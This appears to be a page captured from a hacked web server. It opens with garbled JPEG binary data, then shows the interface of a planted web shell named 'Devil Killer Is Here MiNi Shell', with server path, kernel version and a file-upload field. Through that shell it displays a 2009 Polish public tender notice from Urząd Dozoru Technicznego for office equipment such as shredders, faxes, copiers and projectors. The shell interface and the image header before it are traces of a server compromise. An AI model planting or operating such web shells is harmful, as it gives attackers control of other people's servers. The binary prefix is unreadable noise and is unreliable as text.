JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/243286-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu biurowego dla Urzędu Dozoru Technicznego</b><br>
<b>Numer ogłoszenia: 243286 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dozoru Technicznego , ul. Szczęśliwicka 34, 02-353 Warszawa, woj. mazowieckie, tel. 022 5722100, faks 022 5722388.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.udt.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu biurowego dla Urzędu Dozoru Technicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa i instalacja fabrycznie nowego sprzętu biurowego wraz z dostawą materiałów eksploatacyjnych (zwane dalej sprzętem) do Urzędu Dozoru Technicznego i jego Oddziałów.
2.Sprzęt biurowy musi być fabrycznie nowy, kategorii I, nieużywany, wyprodukowany w 2009 r., nie może nosić śladów uszkodzeń zewnętrznych, uprzedniego używania i musi być gotowy do pracy, tzn. min. być wyposażony we wszystkie elementy jego wyposażenia oraz niezbędne materiały eksploatacyjne.
3. Materiały eksploatacyjne muszą być nowe, nieużywane, wyprodukowane w 2009 r. oryginalne a ich opakowanie nie może nosić śladów uszkodzenia.              
4. Opis przedmiotu zamówienia:
1) Niszczarki osobiste o średnim natężeniu i o jakości nie gorszej niż model HSM Shredstar X15 oraz parametrach technicznych -37 szt.:
- niszczenie jednorazowo 15 kartek (70g/m2)
- poziom bezpieczeństwa DIN 3
- szerokość wejścia min. 225 mm
- kosz o pojemności 25 litrów
- możliwość niszczenia dokumentów  z zszywkami, spinaczami, kart kredytowych, CD/DVD   i dyskietek,
- funkcja cofania
- automatyczny start/stop
2) Niszczarki biurowe do pracy o dużym natężeniu i o jakości nie gorszej niż model HSM 225.2 oraz parametrach technicznych - 5 szt.:
- niszczenie jednorazowo 42 kartek (70g/m2)
- poziom bezpieczeństwa DIN 2
- szerokość wejścia min. 300 mm
- kosz o pojemności 105 litrów
- możliwość niszczenia dokumentów  ze zszywkami, spinaczami, karty kredytowe, płyty CD/DVD oraz dyskietki
- automatyczny start/stop
- ruchoma klapka zabezpieczająca nad szczeliną wejściową
- włącznik zasilania zintegrowany z funkcją cofania
- wyjmowany pojemnik na ścinki
- zatrzymywanie automatyczne przy zapełnionym lub wyjętym koszu
3) Faks laserowy wolnostojący oraz kabel USB/LPT umożliwiający podłączenie do komputera o jakości i parametrach technicznych nie gorszych niż model Canon L390 - 12 szt.:
- zgodność z G3
- typ linii telefonicznej PSTN, PABX
- transmisja bezpośrednia
- transmisja z pamięci
- transmisja z opóźnieniem (200 odbiorców)
- odbiór z opóźnieniem w przypadku zacięcia lub braku papieru
- pamięć faksu 510 stron
- szybkość transmisji 3 sekundy/stronę A4
- automatyczne i ręczne ponawianie wybierania
- możliwość rozbudowania urządzenia o automatyczną sekretarkę
- rozdzielczość 600x600 dpi
- zoom w zakresie 50-200%
- drukowanie laserowe
- szybkość drukowania 18 str/1 min
- kopiowanie w zakresie 1-99 stron
- automatyczny tryb przełączania faks-telefon
- odbiór zdalny
- odbiór z pamięci
- wybieranie jedno przyciskowe min. 31 odbiorców
- wybieranie kodowe min. 169 odbiorców
- wybieranie grupowe min. 199 lokalizacji
- rozmiar dokumentów w zakresie formatu A4
- pojemność podajnika papieru min. 500 arkuszy
- automatyczny podajnik dokumentów min 50 arkuszy
- możliwość podłączenia do komputera
- skala odcieni szarości 256
- oszczędność energii- Energy Star.
4) Tonery do urządzenia z  poz. 3 - komplety*
-24 kpl
5) Faks laserowy wolnostojący o jakości i parametrach technicznych nie gorszych niż model Canon MF8180C (A4) Super G3 FAX oraz parametrach technicznych - 2 szt.:
- Jakość druku: 2400 x 600 dpi 
- 19 stron na minutę w trybie monochromatycznym, 4 strony na minutę w trybie kolorowym
- Skanowanie w kolorze: 9600 x 9600 dpi 
- Wbudowany interfejs sieciowy umożliwiający drukowanie/przesyłanie faksów
- Łatwa wymiana kaset z tonerem
- Kolorowe laserowe urządzenie wielofunkcyjne 
- Druk 19 stron na minutę w czerni, 4 str./min w kolorze 
- Maksymalna rozdzielczość druku 2400 x 600dpi 
- Modem Super G3 Fax, 33.6Kb/sek. 
- Pamięć telefaksu - 256 stron dokumentów 
- 19 czarno-białych; 4 kolorowych kopii na minutę 
- 50-stronicowy Automatyczny Podajnik Dokumentów 
- Pojemność kasety na papier - 250 arkuszy 
- Kolorowy skaner CCD - 1200 x 2400 dpi CCD 
- Hi-Speed USB 2.0 
- Wbudowana praca w sieci komputerowej, drukowanie i faksowanie (nadawanie) z komputera
- zastosowanie technologii Fixing On-Demand
- automatyczny podajnik dokumentów pojemności 50 kartek
- wbudowany interfejs sieciowy Ethernet
- kaseta na papier pojemności 250 kartek, podajnik wielofunkcyjny pojemności 125 kartek
- faks Super G3: modem o szybkości 33 KB/sek (przesyłający dane z szybkością 3 sekundy na stronę A4) i szybkie wybieranie kodowe 118 numerów
6) Tonery do urządzenia z  poz. 5 - komplety*
-4 kpl
7) Kopiarka biurowa laserowa format A3 o jakości i parametrach technicznych nie gorszych niż model Canon iR 4570 oraz parametrach technicznych- 1 szt.:
- zestaw: duplex, podstawa, sorter elektroniczny, sieciowy serwer wydruków,  skaner 
- prędkość kopiowania                                 A4  45 kopii/min 
- prędkość kopiowania                                 A3  22 kopii/min 
- maksymalny format oryginału/kopii               A3 
- zoom                                                          25-400% 
- pamięć                                                        256 mb 
- pamięć dodatkowa                                          20 gb 
- duplex                                                        
- jednorazowa ilość kopii                                  1-999 
- pojemność papieru                                        4 x 550 ark. 
- pojemność podajnika bocznego                              50 ark. 
- rozdzielczość druku                                      1200 x 600 dpi 
8) Tonery do urządzenia z  poz. 7 - komplety*
- 2 kpl
9) Kopiarka biurowa laserowa format A3 o jakości i parametrach technicznych nie gorszych niż model Xerox WC 5225 - 6 szt. :
- maksymalny format oryginału A3
- drukowanie sieciowe
- prędkość kopiowania 25 str/min
- drukowanie, kopiowanie, skanowanie
- rozdzielczość druku 1200x1200 dpi
- rozdzielczość kopiowania do 600x600dpi
- pamięć minimum 512 MB
- kopiowanie, drukowanie dwustronne
- dysk twardy 40 GB
- automatyczny podajnik dwustronny na 75 arkuszy
- 3 podajniki na 1100 arkuszy
- szafka
- oszczędność energii - Energy Star.
Uwaga: sprzęt wymaga zainstalowania.
10) Tonery do urządzenia z  poz. 9-komplety*
- 12 kpl
11) Kopiarka biurowa laserowa format A3 o jakości i parametrach technicznych nie gorszych niż model Xerox C 118 +DADF- 4 szt.:
- format A3
- prędkość 18 str/min
- podawanie papieru minimum 350 arkuszy
- duplex
- szafka
- automatyczny podajnik dwustronny na 50 arkuszy
- kopiowanie dwustronne
- rozdzielczość 1200x1200 dpi
- oszczędność energii - Energy Star
Uwaga: sprzęt wymaga zainstalowania.
12) Tonery do urządzenia z  poz. 11-komplety*
- 8 kpl
13) Bindownica elektryczna do grzbietów plastikowych zaprojektowana do pracy w dużym natężeniu o jakości nie gorszej niż model D-160 oraz parametrach technicznych - 2 szt.:
- dziurkowanie elektryczne, jednorazowo 25 kartek A4
- oprawianie dokumentów o grubości do 510 kartek A4
- regulacja dziurkowania 
- metalowa konstrukcja
- 21 wyjmowanych noży dziurkujących
- szczelina do dziurkowania arkuszy szerszych niż A4
- funkcja Auto Reverse
14) Bindownica ręczna do grzbietów plastikowych o jakości nie gorszej niż model Jazon oraz parametrach technicznych - 3 szt.:
- dziurkowanie jednorazowo 25 kartek A4
- oprawianie dokumentów o grubości do 510 kartek A4, 
- regulacja dziurkowania
- dwie odrębne dźwignie do otwierania i dziurkowania grzbietu
- wskaźnik dostosowania grzbietu do ilości kartek.   
15) Laminator do pracy o dużym natężeniu, o jakości nie gorszej niż model Swordfish 330HD oraz parametrach technicznych - 11 szt.:
- laminowanie na gorąco z wykorzystaniem 4 wałków grzewczych 
- płynna regulacja temperatury 
- przycisk zwalniający blokadę 
- prędkość laminowania 350 mm / min 
- obsługa profesjonalnej folii laminującej od grubości 2x 75 [125 mic.] do 2x 250 [500  mic] 
- opcja laminowania na zimno 
- czas nagrzewania 4-8 min 
16) Projektor multimedialny o jakości nie gorszej niż PANASONIC model PT-LW80NTE oraz parametrach technicznych - 8 szt.:
- rozdzielczość: UXGA (1600 x 1200) , Full HD (1920 x 1080) , VGA , HD Ready, WXGA 16:9 (1280 x 720)
- jasność: min. 2600 ANSI lumenów
- kontrast: 500:1
- technologia: LCD
- wejścia komputerowe: D-sub HD 15-pin x 1
- wejścia video: RCA pin x 1, Mini DIN 4-pin x 1
- gniazda audio: RCA (L-R) x 1, Audio 3,5mm mini jack
- inne gniazda WYJŚCIA: D-sub HD 15-pin x 1 , Audio monitor out (M3 x 1 stereo) ; INNE: Serial (Mini-DIN 8-pin x 1)
- łączność bezprzewodowa z komputerem
- poziom szumu wentylatora -/29 dB w ECO
- funkcje specjalne: Funkcja Daylightview 4, podtrzymanie układu chłodzenia, polskie menu ekranowe, zabezpieczenia antykradzieżowe, układ chłodzenia z bocznym ruchem powietrza, kompatybilny z systemem Windows Vista, Macintosh,
- łącze bezprzewodowe wlan 54Mb/s
- przewody: Przewód zasilający, przewód VGA
- pilot+ baterie, 
- gwarancja na lampę: min. 6miesięcy lub 5000h
17) Ekran rozwijany elektrycznie o jakości nie gorszej niż model Projecta Compact  Electrol  oraz parametrach technicznych - 5 szt.:
- przeznaczony do montażu ściennego lub sufitowego
- format powierzchni roboczej 4:3
- szerokość ekranu 240 cm
- wysokość ekranu 183 cm
- wyłącznik ścienny
- powierzchnia projekcyjna z materiału Matte White S
- biały kolor kasety
- obsługiwany pilotem
- czarne krawędzie boczne powierzchni ekranu.
18) Stolik projekcyjny o jakości nie gorszej niż model Starboard Mobile oraz parametrach technicznych - 1 szt.:
- stolik o regulowanym kącie pochylenia blatu
- blat z płyty meblowej o wym. 40 x 40 cm 
- kółka z hamulcem
- do samodzielnego montażu
19) Gilotyna, format A3 o jakości nie gorszej niż model HSM CA 3640 oraz parametrach technicznych - 1 szt.:
- cięcie jednorazowo min A3
- długość ostrza 360 mm
- długość cięcia: 360 mm
- automatyczny docisk papieru
- wymiary  394x608x427 mm
- ostrza gilotyny wykonane ze specjalnie hartowanej stali
- ilość jednorazowo ciętych kartek min. 40
- oznaczenia na blacie w centymetrach
- podwójny system ochrony
20) Drukarka etykiet o jakości nie gorszej niż model LP / TLP 2824 oraz parametrach technicznych- 1 szt.:
- sterowniki dla Windows
- rozmiar rolki z etykietami:wysokość rolki 127 mm na rdzeniu 25 mm
grubość papieru: 0,08 mm do 18 mm
szerokość etykiety: od 25,4 mm do 61 mm
- maksymalny obszar wydruku szerokość: 56 mm; długość: 279 mm
- rozdzielczość 203dpi (8 pkt/mm)
- maksymalna szybkość wydruku	89 mm/sek.
- szerokość etykiet od 28 mm do 60 mm
- wymiary (szer./głęb./wys.) 93mm /190mm /173mm 
- waga do 1,5 kg 

*)Za komplet uważa się wszystkie kolory potrzebne dla danego urządzenia.

5. Miejsce wykonania zamówienia: siedziba Urzędu Dozoru Technicznego w Warszawie oraz wskazane oddziały UDT.
6. Dostarczony towar musi spełniać wszystkie wymogi określone 
w ogłoszeniu i wzorze umowy.
7. Dostawa przedmiotu powinna być przez Wykonawcę awizowana właściwej jednostce UDT (faksem lub telefonicznie) na minimum 3 dni robocze przed datą dostawy. 
8. Dostawy będą realizowane w godzinach pracy jednostek UDT i będą potwierdzone podpisanym przez obie strony protokołem odbioru przedmiotu dostawy. 
9. W przypadku zakończenia produkcji lub wycofania danego sprzętu z produkcji, Wykonawca dostarczy aktualne wersje sprzętu o parametrach spełniających wymogi techniczno-jakościowe lub lepsze od wycofanych, z zachowaniem ceny pierwotnej zamówionego sprzętu, po uprzedniej akceptacji zmiany przez Zamawiającego. 
10. Zamawiający dopuszcza zaoferowanie sprzętu równoważnego w stosunku do sprzętu przykładowego, wymienionego w pkt 3 ppkt 3.4, przy czym sprzęt równoważny musi charakteryzować się jakościowo i parametrami technicznymi nie gorszymi niż wskazane w pkt 4.
11. Gwarancja: minimum 12 miesięcy - dotyczy każdego sprzętu . W przypadku gdy okres gwarancji udzielonej przez producenta sprzętu jest dłuższy - obowiązuje gwarancja producenta.
12. Termin dostawy sprzętu - 45 dni od dnia podpisania umowy.
13. Miejsce dostawy sprzętu: siedziby jednostek UDT, wyszczególnione w Załączniku nr 2 do wzoru umowy (Wykonawca zobowiązany jest do wniesienia dostarczanego sprzętu do pomieszczeń wskazanych przez Zamawiającego), ilości podane w Załączniku nr 1 do wzoru umowy.
14. Zamawiający wymaga aby Wykonawca wraz ze sprzętem przekazał Zamawiającemu wszystkie elementy jego wyposażenia oraz dokumentację, karty gwarancyjne, instrukcje obsługi i konserwacji sporządzone w języku polskim. 
15. Oferowany sprzęt musi być gotowy do użycia tj. musi posiadać akcesoria niezbędne do pracy danego urządzenia m.in.: baterie, kable, zasilacze).
16. Wykonawca zobowiązany jest przepisami ustawy z 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. Nr 180, poz. 1495 z późn. zm.), w tym w szczególności art. 42 ustawy. 
17.Wszystkie załączniki do Ogłoszenia dostępne są na stronie internetowej Zamawiającego: www.udt.gov.pl, w zakładce Zamówienia publiczne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.30.00-7, 31.12.51.00-2.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. Wykonawca wykonał, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę sprzętu biurowego, odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. obejmującą między innymi co najmniej dwa rodzaje sprzętu: niszczarki,  faksy, kopiarki, bindownice, laminatowy, projektory multimedialne, drukarki etykiet o wartości (łącznie) nie mniejszej niż 100.000,00 PLN brutto;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;

Ocena spełniania tych warunków będzie polegała na ocenie spełnia/nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach wymienionych W punkcie poniżej (Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu spełniania warunków, o których mowa w punkcie (Opis warunków udziału w postępowaniu) ogłoszenia należy złożyć: 
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez upełnomocnionego przedstawiciela Wykonawcy) wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej;
b) Wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawą sprzętu biurowego, stanowiącego przedmiot zamówienia - na potwierdzenie spełniania warunku opisanego w pkt b) Opisu warunków udziału w postępowaniu, z podaniem ich wartości brutto, daty wykonania i odbiorców (nazwa, adres, tel./fax.) oraz załączenie dokumentów potwierdzających, że te dostawy zostały wykonane należycie -wzór wykazu dostaw stanowi Załącznik nr 5 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego;
c) Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego, o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych - zgodnie z Załącznikiem nr 3 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego;
d) Wypełniony i podpisany Wniosek o dopuszczenie do licytacji elektronicznej - na formularzu stanowiącym załącznik nr 1 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego;
e) Wypełniony Formularz Wykonawcy stanowiący Załącznik nr 2 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego. Ponadto Wykonawca w/w formularz prześle elektronicznie na adres e-mail: azp@udt.gov.pl 
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 ppkt. a) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
3. Dokumenty, o których mowa w pkt 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt 3 stosuje się odpowiednio.
5. Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez Wykonawcę (osobę uprawnioną do podpisania oferty).
6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich wniosek musi spełniać następujące wymagania:
- w odniesieniu do wymagań postawionych przez Zamawiającego każdy 
z przedsiębiorców wspólnie składających wniosek oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, tj. każdy z partnerów składa osobno dokumenty określone w pkt 1. ppkt a) Reszta dokumentów może być złożona wspólnie, przy czym oświadczenie zgodnie z załącznikiem nr 3 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego każdy Wykonawca musi złożyć osobno w zakresie określonym w pkt 4) oświadczenia, a w stosunku do punktu 1), 2) i 3) oświadczenie może być złożone wspólnie;
- wniosek składany wspólnie musi być podpisany przez przedstawiciela upoważnionego przez wszystkich występujących wspólnie uczestników postępowania lub musi być podpisany przez każdego uczestnika występującego wspólnie;
- wniosek musi być podpisany w taki sposób, by prawnie zobowiązywał wszystkich  Wykonawców występujących wspólnie, 
- Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) 
do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie może wynikać z treści umowy łączącej Wykonawców lub zostać przedłożone oddzielnie wraz z wnioskiem. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania;
- wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem(liderem);
- wypełniając wniosek o dopuszczenie do licytacji, jak również inne dokumenty powołujące się na Wykonawcę; w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące podmiotów występujących wspólnie;
- Zamawiający przed zawarciem umowy o udzielenie zamówienia publicznego będzie żądał dostarczenia umowy regulującej współpracę podmiotów występujących wspólnie.
UWAGA! Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów lub, którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w niniejszym punkcie, zawierające błędy lub, którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia wniosek Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożenie na wezwanie Zamawiającego oświadczeń i dokumentów powinny potwierdzać spełnienie przez Wykonawcę warunków w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków.
9. Zamawiający dopuszcza do udziału w licytacji elektronicznej i zaprasza do składania ofert wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu.
10. Informacja o dopuszczeniu do udziału w licytacji elektronicznej przekazana zostanie Wykonawcom przez Zamawiającego na podany we Wniosku o dopuszczenie do udziału w postępowaniu adres korespondencyjny(forma papierowa) oraz na adres e-mail lub faks do dnia 31 lipca 2009 r. 
11. Zamawiający przekaże do dnia 31 lipca 2009 r. prowadzącemu licytację (firmie PWPW S.A.) informację o Wykonawcach dopuszczonych do udziału w postępowaniu (Formularze Wykonawców)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> www.ppp.pwpw.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.udt.gov.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wykonawcy składają, wraz z Wnioskiem o dopuszczenie do licytacji Formularz Wykonawcy.
